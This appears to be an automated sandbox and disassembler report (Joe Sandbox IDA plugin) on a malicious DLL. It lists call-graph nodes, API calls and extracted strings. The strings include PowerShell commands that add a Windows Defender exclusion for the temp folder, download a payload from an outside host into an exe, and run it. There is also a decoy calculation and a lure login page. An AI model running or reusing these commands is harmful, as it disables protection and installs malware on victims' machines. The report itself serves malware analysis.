16689->16691 16696 6d40f9c2 16689->16696 16693 6d40f9af 16691->16693 16695 6d40d160 __InternalCxxFrameHandler 8 API calls 16693->16695 16695->16696 16728 6d4103e5 16696->16728 16697->16685 16699 6d419481 __InternalCxxFrameHandler EnterCriticalSection LeaveCriticalSection 16698->16699 16700 6d40f98e 16699->16700 16700->16689 16701 6d419595 16700->16701 16702 6d4195a1 _unexpected 16701->16702 16703 6d4195c8 __InternalCxxFrameHandler 16702->16703 16704 6d4120a4 _free 20 API calls 16702->16704 16709 6d4195ce __InternalCxxFrameHandler 16702->16709 16705 6d419613 16703->16705 16703->16709 16727 6d4195fd 16703->16727 16704->16703 16706 6d40de26 _free 20 API calls 16705->16706 16707 6d419618 16706->16707 16708 6d40d325 _Fputc 26 API calls 16707->16708 16708->16727 16712 6d40d447 std::_Lockit::_Lockit EnterCriticalSection 16709->16712 16713 6d41963f 16709->16713 16710 6d420300 __InternalCxxFrameHandler 5 API calls 16711 6d41978a 16710->16711 16711->16689 16712->16713 16714 6d419699 16713->16714 16716 6d419691 16713->16716 16718 6d40d48f std::_Lockit::~_Lockit LeaveCriticalSection 16713->16718 16724 6d4196c4 16713->16724 16720 6d41958c __InternalCxxFrameHandler 39 API calls 16714->16720 16714->16724 16715 6d419743 __InternalCxxFrameHandler LeaveCriticalSection 16717 6d419718 16715->16717 16719 6d4103e5 __InternalCxxFrameHandler 29 API calls 16716->16719 16721 6d411f56 _unexpected 39 API calls 16717->16721 16725 6d419727 16717->16725 16717->16727 16718->16716 16719->16714 16722 6d4196ba 16720->16722 16721->16725 16723 6d41958c __InternalCxxFrameHandler 39 API calls 16722->16723 16723->16724 16724->16715 16726 6d411f56 _unexpected 39 API calls 16725->16726 16725->16727 16726->16727 16727->16710 16729 6d410271 __InternalCxxFrameHandler 29 API calls 16728->16729 16730 6d40f9cc 16729->16730 16732 6d415e9b 16731->16732 16733 6d415e8d 16731->16733 16734 6d40de26 _free 20 API calls 16732->16734 16733->16732 16738 6d415eb4 16733->16738 16735 6d415ea5 16734->16735 16736 6d40d325 
_Fputc 26 API calls 16735->16736 16737 6d40dd95 16736->16737 16737->16657 16737->16660 16738->16737 16739 6d40de26 _free 20 API calls 16738->16739 16739->16735 16741 6d402054 __cftof 16740->16741 16748 6d4020be 16741->16748 16820 6d4054b0 16741->16820 16743 6d402138 CreateProcessW 16744 6d402170 GetLastError 16743->16744 16745 6d4021a3 WaitForSingleObject CloseHandle CloseHandle 16743->16745 16746 6d404670 __DllMainCRTStartup@12 28 API calls 16744->16746 16747 6d402197 16745->16747 16749 6d402187 16746->16749 16750 6d4021fa error_info_injector 16747->16750 16755 6d402228 16747->16755 16748->16743 16838 6d405650 16748->16838 16853 6d402790 16749->16853 16753 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16750->16753 16756 6d402221 16753->16756 16757 6d40d335 std::ios_base::_Init 26 API calls 16755->16757 16756->16082 16759 6d40222d 16757->16759 16758 6d404910 __DllMainCRTStartup@12 74 API calls 16758->16747 16760 6d403550 std::ios_base::_Init 28 API calls 16759->16760 16761 6d402280 16760->16761 16762 6d403550 std::ios_base::_Init 28 API calls 16761->16762 16763 6d4022af 16762->16763 16764 6d403550 std::ios_base::_Init 28 API calls 16763->16764 16765 6d4022db 16764->16765 16766 6d403550 std::ios_base::_Init 28 API calls 16765->16766 16767 6d402307 16766->16767 16768 6d404670 __DllMainCRTStartup@12 28 API calls 16767->16768 16769 6d40231a 16768->16769 16770 6d404910 __DllMainCRTStartup@12 74 API calls 16769->16770 16771 6d402320 16770->16771 16772 6d402000 __DllMainCRTStartup@12 78 API calls 16771->16772 16773 6d40232b 16772->16773 16774 6d404670 __DllMainCRTStartup@12 28 API calls 16773->16774 16775 6d40233a 16774->16775 16776 6d404910 __DllMainCRTStartup@12 74 API calls 16775->16776 16777 6d402340 Sleep 16776->16777 16778 6d402000 __DllMainCRTStartup@12 78 API calls 16777->16778 16779 6d402356 16778->16779 16780 6d404670 __DllMainCRTStartup@12 28 API calls 16779->16780 16781 6d402365 16780->16781 16782 6d404910 __DllMainCRTStartup@12 
74 API calls 16781->16782 16783 6d40236b Sleep 16782->16783 16784 6d402000 __DllMainCRTStartup@12 78 API calls 16783->16784 16785 6d402381 16784->16785 16786 6d404670 __DllMainCRTStartup@12 28 API calls 16785->16786 16787 6d402390 16786->16787 16788 6d404910 __DllMainCRTStartup@12 74 API calls 16787->16788 16790 6d402396 error_info_injector 16788->16790 16789 6d4024b0 16792 6d40d335 std::ios_base::_Init 26 API calls 16789->16792 16790->16789 16791 6d40248d error_info_injector 16790->16791 16793 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16791->16793 16794 6d4024b5 16792->16794 16795 6d4024ac 16793->16795 16796 6d4025cb 16794->16796 16797 6d4011c0 __DllMainCRTStartup@12 2 API calls 16794->16797 16795->16082 16796->16082 16798 6d4024df 16797->16798 16799 6d4011c0 __DllMainCRTStartup@12 2 API calls 16798->16799 16802 6d4024f3 16799->16802 16800 6d402547 16801 6d4011c0 __DllMainCRTStartup@12 2 API calls 16800->16801 16803 6d40255a 16801->16803 16802->16800 16804 6d4011c0 __DllMainCRTStartup@12 2 API calls 16802->16804 16805 6d404670 __DllMainCRTStartup@12 28 API calls 16803->16805 16804->16802 16806 6d40256b 16805->16806 16807 6d4025e0 __DllMainCRTStartup@12 74 API calls 16806->16807 16808 6d402572 16807->16808 16809 6d404910 __DllMainCRTStartup@12 74 API calls 16808->16809 16810 6d402578 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16809->16810 16811 6d404670 __DllMainCRTStartup@12 28 API calls 16810->16811 16812 6d4025aa 16811->16812 16813 6d4025e0 __DllMainCRTStartup@12 74 API calls 16812->16813 16814 6d4025b1 16813->16814 16815 6d404670 __DllMainCRTStartup@12 28 API calls 16814->16815 16816 6d4025bd 16815->16816 16817 6d404910 __DllMainCRTStartup@12 74 API calls 16816->16817 16818 6d4025c3 16817->16818 16819 6d402230 __DllMainCRTStartup@12 78 API calls 16818->16819 16819->16796 16821 6d4055e1 16820->16821 16824 6d4054d5 16820->16824 16822 6d401440 std::ios_base::_Init 28 API calls 16821->16822 16833 6d40553b _Yarn 16822->16833 16823 
6d40d335 std::ios_base::_Init 26 API calls 16832 6d4055eb 16823->16832 16825 6d4055dc 16824->16825 16827 6d405551 16824->16827 16828 6d40552a 16824->16828 16826 6d401370 Concurrency::cancel_current_task 28 API calls 16825->16826 16826->16821 16830 6d407b01 codecvt 28 API calls 16827->16830 16827->16833 16828->16825 16829 6d405535 16828->16829 16831 6d407b01 codecvt 28 API calls 16829->16831 16830->16833 16831->16833 16834 6d405620 error_info_injector 16832->16834 16835 6d40d335 std::ios_base::_Init 26 API calls 16832->16835 16833->16823 16837 6d4055ac _Yarn error_info_injector 16833->16837 16834->16748 16836 6d405646 16835->16836 16837->16748 16839 6d4057a1 16838->16839 16842 6d405673 16838->16842 16840 6d401440 std::ios_base::_Init 28 API calls 16839->16840 16851 6d4056d4 _Yarn 16840->16851 16841 6d40d335 std::ios_base::_Init 26 API calls 16845 6d4057ab 16841->16845 16843 6d40579c 16842->16843 16846 6d4056c3 16842->16846 16847 6d4056ed 16842->16847 16844 6d401370 Concurrency::cancel_current_task 28 API calls 16843->16844 16844->16839 16846->16843 16848 6d4056ce 16846->16848 16849 6d407b01 codecvt 28 API calls 16847->16849 16847->16851 16850 6d407b01 codecvt 28 API calls 16848->16850 16849->16851 16850->16851 16851->16841 16852 6d40575c _Yarn error_info_injector 16851->16852 16852->16748 16854 6d4027d5 16853->16854 16855 6d4027f0 16854->16855 16856 6d4042c0 __DllMainCRTStartup@12 28 API calls 16854->16856 16858 6d4049b0 __DllMainCRTStartup@12 74 API calls 16855->16858 16859 6d402846 16855->16859 16856->16855 16857 6d401f30 std::ios_base::_Init 28 API calls 16861 6d4028ef 16857->16861 16858->16859 16859->16857 16860 6d402191 16860->16758 16861->16860 16862 6d404380 __DllMainCRTStartup@12 28 API calls 16861->16862 16862->16860 16877 6d41090a 16863->16877 16865 6d408057 16865->15506 16867 6d41027f 16866->16867 16876 6d410290 16866->16876 16896 6d410319 GetModuleHandleW 16867->16896 16905 6d41013f 16876->16905 16878 6d410916 ___scrt_is_nonwritable_in_current_image 
16877->16878 16885 6d40d447 EnterCriticalSection 16878->16885 16880 6d410924 16886 6d410b0c 16880->16886 16884 6d410942 _Fputc 16884->16865 16885->16880 16889 6d410b2c 16886->16889 16891 6d410b34 16886->16891 16887 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16888 6d410931 16887->16888 16892 6d41094f 16888->16892 16889->16887 16890 6d411902 _free 20 API calls 16890->16889 16891->16889 16891->16890 16895 6d40d48f LeaveCriticalSection 16892->16895 16894 6d410959 16894->16884 16895->16894 16897 6d410284 16896->16897 16897->16876 16898 6d41035d GetModuleHandleExW 16897->16898 16899 6d410387 GetProcAddress 16898->16899 16904 6d41039c 16898->16904 16899->16904 16900 6d4103b0 FreeLibrary 16901 6d4103b9 16900->16901 16902 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16901->16902 16903 6d4103c3 16902->16903 16903->16876 16904->16900 16904->16901 16906 6d41014b ___scrt_is_nonwritable_in_current_image 16905->16906 16921 6d40d447 EnterCriticalSection 16906->16921 16908 6d410155 16922 6d410182 16908->16922 16921->16908 16924 6d41018e _unexpected 16922->16924 16926 6d4101fb 16924->16926 16928 6d410c46 __DllMainCRTStartup@12 20 API calls 16924->16928 16931 6d410229 16924->16931 16927 6d410218 16926->16927 16929 6d40ff0b __InternalCxxFrameHandler 5 API calls 16926->16929 16930 6d40ff0b __InternalCxxFrameHandler 5 API calls 16927->16930 16928->16926 16929->16927 16930->16931 16935 6d420300 16931->16935 16936 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16935->16936 16937 6d42030a 16936->16937 16937->16937 16950 6d40a92e 16948->16950 16951 6d408640 16948->16951 16949 6d40d143 ___std_exception_copy 20 API calls 16949->16950 16950->16949 16950->16951 16951->15510 16953 6d410e23 16952->16953 16954 6d410e35 16952->16954 16955 6d410e31 16953->16955 16959 6d40e381 16953->16959 16962 6d41a817 16954->16962 16955->16032 16966 6d40e233 16959->16966 16965 6d41a830 16962->16965 16963 6d407ac2 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16964 6d410e44 16963->16964 16964->16032 16965->16963 16969 6d40e13b 16966->16969 16968 6d40e272 16968->16955 16970 6d40e147 ___scrt_is_nonwritable_in_current_image 16969->16970 16977 6d40d447 EnterCriticalSection 16970->16977 16972 6d40e1bd 16986 6d40e1d1 16972->16986 16973 6d40e151 ___scrt_uninitialize_crt 16973->16972 16978 6d40e0ba 16973->16978 16975 6d40e1c9 _Fputc 16975->16968 16977->16973 16979 6d40e0c6 ___scrt_is_nonwritable_in_current_image 16978->16979 16989 6d40dfa3 EnterCriticalSection 16979->16989 16981 6d40e0d0 ___scrt_uninitialize_crt 16982 6d40e108 16981->16982 16990 6d40e33a 16981->16990 17000 6d40e12f 16982->17000 16985 6d40e127 _Fputc 16985->16973 17067 6d40d48f LeaveCriticalSection 16986->17067 16988 6d40e1db 16988->16975 16989->16981 16991 6d40e350 16990->16991 16992 6d40e347 16990->16992 17003 6d40e2d7 16991->17003 16994 6d40e233 ___scrt_uninitialize_crt 68 API calls 16992->16994 16995 6d40e34d 16994->16995 16995->16982 16998 6d40e370 17016 6d416242 16998->17016 17066 6d40dfb7 LeaveCriticalSection 17000->17066 17002 6d40e139 17002->16985 17004 6d40e2ee 17003->17004 17008 6d40e313 17003->17008 17005 6d412bf6 _Fputc 26 API calls 17004->17005 17004->17008 17006 6d40e30c 17005->17006 17027 6d416862 17006->17027 17008->16995 17009 6d412bf6 17008->17009 17010 6d412c02 17009->17010 17011 6d412c17 17009->17011 17012 6d40de26 _free 20 API calls 17010->17012 17011->16998 17013 6d412c07 17012->17013 17014 6d40d325 _Fputc 26 API calls 17013->17014 17015 6d412c12 17014->17015 17015->16998 17017 6d416260 17016->17017 17018 6d416253 17016->17018 17020 6d4162a9 17017->17020 17023 6d416287 17017->17023 17019 6d40de26 _free 20 API calls 17018->17019 17025 6d416258 17019->17025 17021 6d40de26 _free 20 API calls 17020->17021 17022 6d4162ae 17021->17022 17024 6d40d325 _Fputc 26 API calls 17022->17024 17052 6d4161aa 17023->17052 17024->17025 17025->16995 17028 6d41686e 

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000200,00000000,00000000,?,?,189157A1,?,00000000), ref: 6D402166
                                                                                                      • GetLastError.KERNEL32 ref: 6D402170
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D4021AB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6D4021BD
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6D4021C5
                                                                                                      • Sleep.KERNELBASE(000005DC,?,189157A1), ref: 6D402348
                                                                                                      • Sleep.KERNELBASE(00003A98,?,?,189157A1), ref: 6D402373
                                                                                                      Strings
                                                                                                      • .Wu, xrefs: 6D4021B7
                                                                                                      • cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", xrefs: 6D402293
                                                                                                      • Process launched successfully., xrefs: 6D402307, 6D40232B, 6D402356, 6D402381
                                                                                                      • Time taken: , xrefs: 6D40259B
                                                                                                      • cmd /c %temp%/eryy65ty.exe, xrefs: 6D4022EB
                                                                                                      • cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, xrefs: 6D4022BF
                                                                                                      • CreateProcess failed: , xrefs: 6D402178
                                                                                                      • powershell start-process https://digify.com/a/#/access/login, xrefs: 6D402264
                                                                                                      • seconds., xrefs: 6D4025B1
                                                                                                      • Calculated sum of squares for 5 seconds: , xrefs: 6D40255C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep$CreateErrorLastObjectProcessSingleWait
                                                                                                      • String ID: seconds.$Calculated sum of squares for 5 seconds: $CreateProcess failed: $Process launched successfully.$Time taken: $cmd /c %temp%/eryy65ty.exe$cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"$cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe$powershell start-process https://digify.com/a/#/access/login$.Wu
                                                                                                      • API String ID: 1028668984-3980233284
                                                                                                      • Opcode ID: e86db026ad2503a099e5a94e5722619f37dac8ecae27a1baa46c671bf83e5c7b
                                                                                                      • Instruction ID: f0510d60e43d4847a45b69f49522af5a65895a452d51c6f809298bed663dfa51
                                                                                                      • Opcode Fuzzy Hash: e86db026ad2503a099e5a94e5722619f37dac8ecae27a1baa46c671bf83e5c7b
                                                                                                      • Instruction Fuzzy Hash: 95F1F670E042449BDB14DFB8CC84FAEBBB5EF85308F10852DE515AB2C5DB35AD458BA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D403550: Concurrency::cancel_current_task.LIBCPMT ref: 6D403683
                                                                                                      • Sleep.KERNELBASE(000005DC,?,189157A1), ref: 6D402348
                                                                                                        • Part of subcall function 6D402000: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000200,00000000,00000000,?,?,189157A1,?,00000000), ref: 6D402166
                                                                                                        • Part of subcall function 6D402000: GetLastError.KERNEL32 ref: 6D402170
                                                                                                      • Sleep.KERNELBASE(00003A98,?,?,189157A1), ref: 6D402373
                                                                                                        • Part of subcall function 6D402000: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D4021AB
                                                                                                        • Part of subcall function 6D402000: CloseHandle.KERNEL32(?), ref: 6D4021BD
                                                                                                        • Part of subcall function 6D402000: CloseHandle.KERNEL32(?), ref: 6D4021C5
                                                                                                      Strings
                                                                                                      • cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", xrefs: 6D402293
                                                                                                      • Process launched successfully., xrefs: 6D402307, 6D40232B, 6D402356, 6D402381
                                                                                                      • cmd /c %temp%/eryy65ty.exe, xrefs: 6D4022EB
                                                                                                      • cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, xrefs: 6D4022BF
                                                                                                      • powershell start-process https://digify.com/a/#/access/login, xrefs: 6D402264
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep$Concurrency::cancel_current_taskCreateErrorLastObjectProcessSingleWait
                                                                                                      • String ID: Process launched successfully.$cmd /c %temp%/eryy65ty.exe$cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"$cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe$powershell start-process https://digify.com/a/#/access/login
                                                                                                      • API String ID: 4171290658-3657197600
                                                                                                      • Opcode ID: 35e6b40866af5c6e202eea67c3d57f9c04032dcbffa132a7537a57bcd63ec556
                                                                                                      • Instruction ID: bbcf3b3ceca1231cfe6085289a43d835706f5ec413d54450eae75011accd8f3f
                                                                                                      • Opcode Fuzzy Hash: 35e6b40866af5c6e202eea67c3d57f9c04032dcbffa132a7537a57bcd63ec556
                                                                                                      • Instruction Fuzzy Hash: C561B470A041489BEB14DFA4DC94FAEBB75AF46308F24812CD105BB3C5DB799E858B92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __RTC_Initialize.LIBCMT ref: 6D407CD7
                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6D407CF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2442719207-0
                                                                                                      • Opcode ID: 2698efe2d6cd899a7fbbe0eeba451dcb715d0ce75db1afae84146312e2a72b0c
                                                                                                      • Instruction ID: fe0ce2df2b2f78f07d3eaa73e73f4483e7a71e3d436dc73d1d57a1b3c000ed30
                                                                                                      • Opcode Fuzzy Hash: 2698efe2d6cd899a7fbbe0eeba451dcb715d0ce75db1afae84146312e2a72b0c
                                                                                                      • Instruction Fuzzy Hash: 1041B072D0D655AFDB21DF69C840FBE3A75EF81758F228139EA1467250D7308D029BE2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                      • String ID:
                                                                                                      • API String ID: 3136044242-0
                                                                                                      • Opcode ID: 5172eeed918cbbf877e92d340df6364af4a32711fa6b819c8348e15d271e515e
                                                                                                      • Instruction ID: b2fd478f9ced125a37cfd93eb41001cf200d37d7c05b463e930ecf5371f029be
                                                                                                      • Opcode Fuzzy Hash: 5172eeed918cbbf877e92d340df6364af4a32711fa6b819c8348e15d271e515e
                                                                                                      • Instruction Fuzzy Hash: 9F216071D0D65AABCB219F55C880E7F3A79EF81794B114139EA1467310D7318D428BE1

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D4011C0: __alldvrm.LIBCMT ref: 6D401213
                                                                                                        • Part of subcall function 6D4011C0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D401234
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D402594
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                                                                                      • String ID: seconds.$Calculated sum of squares for 5 seconds: $Time taken:
                                                                                                      • API String ID: 67483490-725188347
                                                                                                      • Opcode ID: 81532171a62f03919a48a539055870cd8231e2399d6cc2675860731e6c876493
                                                                                                      • Instruction ID: 9c02abf738fab573f7a316008a09a8e4cab72b2a09cf71ffad835ca31f7c18dc
                                                                                                      • Opcode Fuzzy Hash: 81532171a62f03919a48a539055870cd8231e2399d6cc2675860731e6c876493
                                                                                                      • Instruction Fuzzy Hash: 2F21C2712182014BC214EF78C8D0E2FB3A9AFD9248F11892DF5459B290EF30ED4986E7

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __RTC_Initialize.LIBCMT ref: 6D407BD6
                                                                                                        • Part of subcall function 6D40862A: InitializeSListHead.KERNEL32(6D430558,6D407BE0,6D42DFC8,00000010,6D407B71,?,?,?,6D407D99,?,00000001,?,?,00000001,?,6D42E010), ref: 6D40862F
                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D407C40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 3231365870-137412459
                                                                                                      • Opcode ID: c7717139f8fe7bef513d1f7ce81df5565a930bef672f032e3c90ba3a770393f4
                                                                                                      • Instruction ID: 2f3b98618f7cbe3d596e975a969f7c9f3f009a851b037aaa8052c881463991d5
                                                                                                      • Opcode Fuzzy Hash: c7717139f8fe7bef513d1f7ce81df5565a930bef672f032e3c90ba3a770393f4
                                                                                                      • Instruction Fuzzy Hash: F021C37294D646AADB00FBB4D501FBC33619F0A36DF22443DD690672C2CB364D41CA96

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6D413F5E
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 6D413F70
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: b7c0da1f32e3b56efab2ab6ca1dc701e307937a5fa435d6af0f1011a6905d095
                                                                                                      • Instruction ID: 099ae50f12eeea59035ac35652e1dbcdd162255314081b271708b9f2282528fb
                                                                                                      • Opcode Fuzzy Hash: b7c0da1f32e3b56efab2ab6ca1dc701e307937a5fa435d6af0f1011a6905d095
                                                                                                      • Instruction Fuzzy Hash: 07117F7151C7835ADB214A3E8C9CB32BEB4AB97234B34075AE1B6866E1C730DD8A8645

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41A67E: GetEnvironmentStringsW.KERNEL32 ref: 6D41A687
                                                                                                        • Part of subcall function 6D41A67E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D41A6AA
                                                                                                        • Part of subcall function 6D41A67E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D41A6D0
                                                                                                        • Part of subcall function 6D41A67E: _free.LIBCMT ref: 6D41A6E3
                                                                                                        • Part of subcall function 6D41A67E: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D41A6F2
                                                                                                      • _free.LIBCMT ref: 6D410746
                                                                                                      • _free.LIBCMT ref: 6D41074D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 400815659-0
                                                                                                      • Opcode ID: 0a18b157f831eefed5b96b0a3502a0fd757df742f97486bd48abb1792690b189
                                                                                                      • Instruction ID: 22441a35d02b4be848ff4cc76f87d6710ed7cbbf37e91bde9f46985df9417afd
                                                                                                      • Opcode Fuzzy Hash: 0a18b157f831eefed5b96b0a3502a0fd757df742f97486bd48abb1792690b189
